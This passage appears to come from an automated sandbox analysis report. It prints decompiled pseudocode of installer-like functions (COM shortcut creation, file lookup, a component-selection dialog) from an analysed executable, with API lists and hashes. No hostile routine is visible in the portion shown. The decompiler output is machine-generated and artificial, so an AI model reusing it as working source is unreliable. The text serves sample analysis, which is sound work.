                                                                                                                                                                                                              					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                              					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
                                                                                                                                                                                                              					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                                                                                                                                                              					if(_t64 >= _t87) {
                                                                                                                                                                                                              						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                              						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                                                                                                                                                              						if(_t105 == _t87) {
                                                                                                                                                                                                              							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                              							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp\\Nla");
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_t109 != _t87) {
                                                                                                                                                                                                              							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                              							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                              						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                                                                                                                                                                              						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                                                                                                                                                                              						if( *_t95 != _t87) {
                                                                                                                                                                                                              							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                              							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                              						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                                                                                                                                                                              						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                              						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                                                                                                                                                                              						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                                                                                              							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                                                                                                                                                              							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                                                                                                                                                              								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                                                                                                              								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                                                                                                              						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                              					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                                                                                              						_push(0xfffffff4);
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				E00401423();
                                                                                                                                                                                                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t111 - 4));
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}






















                                                                                                                                                                                                              0x00402174
                                                                                                                                                                                                              0x0040217e
                                                                                                                                                                                                              0x00402188
                                                                                                                                                                                                              0x00402195
                                                                                                                                                                                                              0x004021a0
                                                                                                                                                                                                              0x004021a3
                                                                                                                                                                                                              0x004021bd
                                                                                                                                                                                                              0x004021c3
                                                                                                                                                                                                              0x004021c9
                                                                                                                                                                                                              0x004021cc
                                                                                                                                                                                                              0x004021d6
                                                                                                                                                                                                              0x004021da
                                                                                                                                                                                                              0x004021da
                                                                                                                                                                                                              0x004021df
                                                                                                                                                                                                              0x004021f0
                                                                                                                                                                                                              0x004021f8
                                                                                                                                                                                                              0x004022d4
                                                                                                                                                                                                              0x004022d4
                                                                                                                                                                                                              0x004022db
                                                                                                                                                                                                              0x004021fe
                                                                                                                                                                                                              0x004021fe
                                                                                                                                                                                                              0x0040220d
                                                                                                                                                                                                              0x00402211
                                                                                                                                                                                                              0x00402214
                                                                                                                                                                                                              0x0040221a
                                                                                                                                                                                                              0x00402228
                                                                                                                                                                                                              0x0040222b
                                                                                                                                                                                                              0x0040222d
                                                                                                                                                                                                              0x00402238
                                                                                                                                                                                                              0x00402238
                                                                                                                                                                                                              0x0040223d
                                                                                                                                                                                                              0x0040223f
                                                                                                                                                                                                              0x00402246
                                                                                                                                                                                                              0x00402246
                                                                                                                                                                                                              0x00402249
                                                                                                                                                                                                              0x00402252
                                                                                                                                                                                                              0x00402255
                                                                                                                                                                                                              0x0040225a
                                                                                                                                                                                                              0x0040225c
                                                                                                                                                                                                              0x00402269
                                                                                                                                                                                                              0x00402269
                                                                                                                                                                                                              0x0040226c
                                                                                                                                                                                                              0x00402278
                                                                                                                                                                                                              0x0040227b
                                                                                                                                                                                                              0x00402284
                                                                                                                                                                                                              0x0040228a
                                                                                                                                                                                                              0x00402291
                                                                                                                                                                                                              0x004022aa
                                                                                                                                                                                                              0x004022ac
                                                                                                                                                                                                              0x004022ba
                                                                                                                                                                                                              0x004022ba
                                                                                                                                                                                                              0x004022aa
                                                                                                                                                                                                              0x004022bd
                                                                                                                                                                                                              0x004022c3
                                                                                                                                                                                                              0x004022c3
                                                                                                                                                                                                              0x004022c6
                                                                                                                                                                                                              0x004022cc
                                                                                                                                                                                                              0x004022d2
                                                                                                                                                                                                              0x004022e7
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004022d2
                                                                                                                                                                                                              0x004022dd
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a69

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?), ref: 004021F0
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\Nla, xrefs: 00402230
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\Nla
                                                                                                                                                                                                              • API String ID: 123533781-1238441443
                                                                                                                                                                                                              • Opcode ID: f26c3f8f6ad4390839e13d278e0de266c46056394c3b9da9cbcc38a07b5ad247
                                                                                                                                                                                                              • Instruction ID: 849b10897e6abda320580ec11bca4de19dcbd678575eb1056a8185fe26502568
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f26c3f8f6ad4390839e13d278e0de266c46056394c3b9da9cbcc38a07b5ad247
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC510671A00208AFCB00DFE4C988A9D7BB6EF48314F2045BAF515EB2D1DA799981CB14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E0040659C(CHAR* _a4) {
                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t2 = FindFirstFileA(_a4, 0x4225a0);
                                                                                                                                                                                                              				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				FindClose(_t2);
                                                                                                                                                                                                              				return 0x4225a0;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x004065a7
                                                                                                                                                                                                              0x004065b0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004065bd
                                                                                                                                                                                                              0x004065b3
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(76712754,004225A0,00422158,00405CF1,00422158,00422158,00000000,00422158,00422158,76712754,?,766F13E0,00405A10,?,76712754,766F13E0), ref: 004065A7
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004065B3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                              • Opcode ID: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                                                                                                                                                                                              • Instruction ID: f69e928bf0ac745f57f8f0961b1e49234d8ba52852923c3f30ba08d6865e50e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64D01231615130FBC3411B38BE0C84B7A5C9F093303619B36F466F12E4D7748D62869C
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                                                                              			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                                                                                                                                                                              					E00406186(__edi, _t6);
                                                                                                                                                                                                              					_push(_t19 - 0x1a4);
                                                                                                                                                                                                              					_push(__esi);
                                                                                                                                                                                                              					E00406228();
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					 *__edi = __ebx;
                                                                                                                                                                                                              					 *__esi = __ebx;
                                                                                                                                                                                                              					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x004027b9
                                                                                                                                                                                                              0x004027cd
                                                                                                                                                                                                              0x004027d8
                                                                                                                                                                                                              0x004027d9
                                                                                                                                                                                                              0x00402918
                                                                                                                                                                                                              0x004027bb
                                                                                                                                                                                                              0x004027bb
                                                                                                                                                                                                              0x004027bd
                                                                                                                                                                                                              0x004027bf
                                                                                                                                                                                                              0x004027bf
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a69

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                              • Opcode ID: d9853b3f7f72fdecc8c24efd0171727e5bc8c12da0f04fb4769dd8d1300cf035
                                                                                                                                                                                                              • Instruction ID: a7d85d328faede53e6a1e3b4f28690110558ed3aa0613785cbf8ce06a9006afe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9853b3f7f72fdecc8c24efd0171727e5bc8c12da0f04fb4769dd8d1300cf035
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35F0A771704111EED710EB649A49AEEB7A8DF51314F20067FF112B60C1D7B88946972A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                              			E00404CB1(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                                                                              				struct HWND__* _v12;
                                                                                                                                                                                                              				long _v16;
                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                                              				signed char* _v32;
                                                                                                                                                                                                              				int _v36;
                                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                                              				int _v48;
                                                                                                                                                                                                              				signed int* _v60;
                                                                                                                                                                                                              				signed char* _v64;
                                                                                                                                                                                                              				signed int _v68;
                                                                                                                                                                                                              				long _v72;
                                                                                                                                                                                                              				void* _v76;
                                                                                                                                                                                                              				intOrPtr _v80;
                                                                                                                                                                                                              				intOrPtr _v84;
                                                                                                                                                                                                              				void* _v88;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int _t203;
                                                                                                                                                                                                              				intOrPtr _t206;
                                                                                                                                                                                                              				intOrPtr _t207;
                                                                                                                                                                                                              				long _t212;
                                                                                                                                                                                                              				signed int _t216;
                                                                                                                                                                                                              				signed int _t227;
                                                                                                                                                                                                              				void* _t230;
                                                                                                                                                                                                              				void* _t231;
                                                                                                                                                                                                              				int _t237;
                                                                                                                                                                                                              				long _t242;
                                                                                                                                                                                                              				long _t243;
                                                                                                                                                                                                              				signed int _t244;
                                                                                                                                                                                                              				signed int _t250;
                                                                                                                                                                                                              				signed int _t252;
                                                                                                                                                                                                              				signed char _t253;
                                                                                                                                                                                                              				signed char _t259;
                                                                                                                                                                                                              				void* _t264;
                                                                                                                                                                                                              				void* _t266;
                                                                                                                                                                                                              				signed char* _t284;
                                                                                                                                                                                                              				signed char _t285;
                                                                                                                                                                                                              				long _t290;
                                                                                                                                                                                                              				signed int _t300;
                                                                                                                                                                                                              				signed int _t308;
                                                                                                                                                                                                              				signed char* _t316;
                                                                                                                                                                                                              				int _t320;
                                                                                                                                                                                                              				int _t321;
                                                                                                                                                                                                              				signed int* _t322;
                                                                                                                                                                                                              				int _t323;
                                                                                                                                                                                                              				long _t324;
                                                                                                                                                                                                              				signed int _t325;
                                                                                                                                                                                                              				long _t327;
                                                                                                                                                                                                              				int _t328;
                                                                                                                                                                                                              				signed int _t329;
                                                                                                                                                                                                              				void* _t331;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                                                                                                                                              				_v8 = GetDlgItem(_a4, 0x408);
                                                                                                                                                                                                              				_t331 = SendMessageA;
                                                                                                                                                                                                              				_v24 =  *0x424788;
                                                                                                                                                                                                              				_v28 =  *0x424754 + 0x94;
                                                                                                                                                                                                              				_t320 = 0x10;
                                                                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                                                                              					L23:
                                                                                                                                                                                                              					if(_a8 != 0x405) {
                                                                                                                                                                                                              						_t298 = _a16;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_a12 = 0;
                                                                                                                                                                                                              						_t298 = 1;
                                                                                                                                                                                                              						_a8 = 0x40f;
                                                                                                                                                                                                              						_a16 = 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                                                                                                              						_v16 = _t298;
                                                                                                                                                                                                              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                                                                                                                                                                              							if(( *0x42475d & 0x00000002) != 0) {
                                                                                                                                                                                                              								L41:
                                                                                                                                                                                                              								if(_v16 != 0) {
                                                                                                                                                                                                              									_t242 = _v16;
                                                                                                                                                                                                              									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                                                                                                                                                                              										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t243 = _v16;
                                                                                                                                                                                                              									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                                                                                                                                                                              										_t298 = _v24;
                                                                                                                                                                                                              										_t244 =  *(_t243 + 0x5c);
                                                                                                                                                                                                              										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                                                                                                                                                              											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L48;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if(_a8 == 0x413) {
                                                                                                                                                                                                              								L33:
                                                                                                                                                                                                              								_t298 = 0 | _a8 != 0x00000413;
                                                                                                                                                                                                              								_t250 = E00404BFF(_v8, _a8 != 0x413);
                                                                                                                                                                                                              								_t325 = _t250;
                                                                                                                                                                                                              								if(_t325 >= 0) {
                                                                                                                                                                                                              									_t99 = _v24 + 8; // 0x8
                                                                                                                                                                                                              									_t298 = _t250 * 0x418 + _t99;
                                                                                                                                                                                                              									_t252 =  *_t298;
                                                                                                                                                                                                              									if((_t252 & 0x00000010) == 0) {
                                                                                                                                                                                                              										if((_t252 & 0x00000040) == 0) {
                                                                                                                                                                                                              											_t253 = _t252 ^ 0x00000001;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											_t259 = _t252 ^ 0x00000080;
                                                                                                                                                                                                              											if(_t259 >= 0) {
                                                                                                                                                                                                              												_t253 = _t259 & 0x000000fe;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												_t253 = _t259 | 0x00000001;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										 *_t298 = _t253;
                                                                                                                                                                                                              										E0040117D(_t325);
                                                                                                                                                                                                              										_a12 = _t325 + 1;
                                                                                                                                                                                                              										_a16 =  !( *0x42475c) >> 0x00000008 & 0x00000001;
                                                                                                                                                                                                              										_a8 = 0x40f;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t298 = _a16;
                                                                                                                                                                                                              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L33;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							goto L48;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						L48:
                                                                                                                                                                                                              						if(_a8 != 0x111) {
                                                                                                                                                                                                              							L56:
                                                                                                                                                                                                              							if(_a8 == 0x200) {
                                                                                                                                                                                                              								SendMessageA(_v8, 0x200, 0, 0);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if(_a8 == 0x40b) {
                                                                                                                                                                                                              								_t230 =  *0x420d34;
                                                                                                                                                                                                              								if(_t230 != 0) {
                                                                                                                                                                                                              									ImageList_Destroy(_t230);
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t231 =  *0x420d48;
                                                                                                                                                                                                              								if(_t231 != 0) {
                                                                                                                                                                                                              									GlobalFree(_t231);
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *0x420d34 = 0;
                                                                                                                                                                                                              								 *0x420d48 = 0;
                                                                                                                                                                                                              								 *0x4247c0 = 0;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if(_a8 != 0x40f) {
                                                                                                                                                                                                              								L90:
                                                                                                                                                                                                              								if(_a8 == 0x420 && ( *0x42475d & 0x00000001) != 0) {
                                                                                                                                                                                                              									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                                                                                                              									ShowWindow(_v8, _t321);
                                                                                                                                                                                                              									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L93;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								E004011EF(_t298, 0, 0);
                                                                                                                                                                                                              								_t203 = _a12;
                                                                                                                                                                                                              								if(_t203 != 0) {
                                                                                                                                                                                                              									if(_t203 != 0xffffffff) {
                                                                                                                                                                                                              										_t203 = _t203 - 1;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_push(_t203);
                                                                                                                                                                                                              									_push(8);
                                                                                                                                                                                                              									E00404C7F();
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(_a16 == 0) {
                                                                                                                                                                                                              									L75:
                                                                                                                                                                                                              									E004011EF(_t298, 0, 0);
                                                                                                                                                                                                              									_v36 =  *0x420d48;
                                                                                                                                                                                                              									_t206 =  *0x424788;
                                                                                                                                                                                                              									_v64 = 0xf030;
                                                                                                                                                                                                              									_v24 = 0;
                                                                                                                                                                                                              									if( *0x42478c <= 0) {
                                                                                                                                                                                                              										L86:
                                                                                                                                                                                                              										if( *0x42474c == 4) {
                                                                                                                                                                                                              											InvalidateRect(_v8, 0, 1);
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_t207 =  *0x423f1c; // 0x2d134b
                                                                                                                                                                                                              										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                                                                                                                                                                              											E00404BBA(0x3ff, 0xfffffffb, E00404BD2(5));
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										goto L90;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t322 = _t206 + 8;
                                                                                                                                                                                                              									do {
                                                                                                                                                                                                              										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                                                                                                                                              										if(_t212 != 0) {
                                                                                                                                                                                                              											_t300 =  *_t322;
                                                                                                                                                                                                              											_v72 = _t212;
                                                                                                                                                                                                              											_v76 = 8;
                                                                                                                                                                                                              											if((_t300 & 0x00000001) != 0) {
                                                                                                                                                                                                              												_v76 = 9;
                                                                                                                                                                                                              												_v60 =  &(_t322[4]);
                                                                                                                                                                                                              												_t322[0] = _t322[0] & 0x000000fe;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if((_t300 & 0x00000040) == 0) {
                                                                                                                                                                                                              												_t216 = (_t300 & 0x00000001) + 1;
                                                                                                                                                                                                              												if((_t300 & 0x00000010) != 0) {
                                                                                                                                                                                                              													_t216 = _t216 + 3;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												_t216 = 3;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                                                                                                                                                                              											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                                                                                                                                              											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_v24 = _v24 + 1;
                                                                                                                                                                                                              										_t322 =  &(_t322[0x106]);
                                                                                                                                                                                                              									} while (_v24 <  *0x42478c);
                                                                                                                                                                                                              									goto L86;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_t323 = E004012E2( *0x420d48);
                                                                                                                                                                                                              									E00401299(_t323);
                                                                                                                                                                                                              									_t227 = 0;
                                                                                                                                                                                                              									_t298 = 0;
                                                                                                                                                                                                              									if(_t323 <= 0) {
                                                                                                                                                                                                              										L74:
                                                                                                                                                                                                              										SendMessageA(_v12, 0x14e, _t298, 0);
                                                                                                                                                                                                              										_a16 = _t323;
                                                                                                                                                                                                              										_a8 = 0x420;
                                                                                                                                                                                                              										goto L75;
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										goto L71;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									do {
                                                                                                                                                                                                              										L71:
                                                                                                                                                                                                              										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                                                                                                                                                                              											_t298 = _t298 + 1;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_t227 = _t227 + 1;
                                                                                                                                                                                                              									} while (_t227 < _t323);
                                                                                                                                                                                                              									goto L74;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                                                                                                              							goto L93;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                                                                                                                                                                              							if(_t237 == 0xffffffff) {
                                                                                                                                                                                                              								goto L93;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                                                                                                                                                                              							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                                                                                                                                                                              								_t324 = 0x20;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							E00401299(_t324);
                                                                                                                                                                                                              							SendMessageA(_a4, 0x420, 0, _t324);
                                                                                                                                                                                                              							_a12 = _a12 | 0xffffffff;
                                                                                                                                                                                                              							_a16 = 0;
                                                                                                                                                                                                              							_a8 = 0x40f;
                                                                                                                                                                                                              							goto L56;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_v36 = 0;
                                                                                                                                                                                                              					 *0x4247c0 = _a4;
                                                                                                                                                                                                              					_v20 = 2;
                                                                                                                                                                                                              					 *0x420d48 = GlobalAlloc(0x40,  *0x42478c << 2);
                                                                                                                                                                                                              					_t264 = LoadImageA( *0x424740, 0x6e, 0, 0, 0, 0);
                                                                                                                                                                                                              					 *0x420d3c =  *0x420d3c | 0xffffffff;
                                                                                                                                                                                                              					_v16 = _t264;
                                                                                                                                                                                                              					 *0x420d44 = SetWindowLongA(_v8, 0xfffffffc, E004052C3);
                                                                                                                                                                                                              					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                                                                                                                                                                              					 *0x420d34 = _t266;
                                                                                                                                                                                                              					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                                                                                                                                                                              					SendMessageA(_v8, 0x1109, 2,  *0x420d34);
                                                                                                                                                                                                              					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                                                                                                                                                                              						SendMessageA(_v8, 0x111b, _t320, 0);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					DeleteObject(_v16);
                                                                                                                                                                                                              					_t327 = 0;
                                                                                                                                                                                                              					do {
                                                                                                                                                                                                              						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                                                                                                                                                                              						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                                                                                                                                                                              							if(_t327 != 0x20) {
                                                                                                                                                                                                              								_v20 = 0;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062BB(0, _t327, _t331, 0, _t272)), _t327);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t327 = _t327 + 1;
